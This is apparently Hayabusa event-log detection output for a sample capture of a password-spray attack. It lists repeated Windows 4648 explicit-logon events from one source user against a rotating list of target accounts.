2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
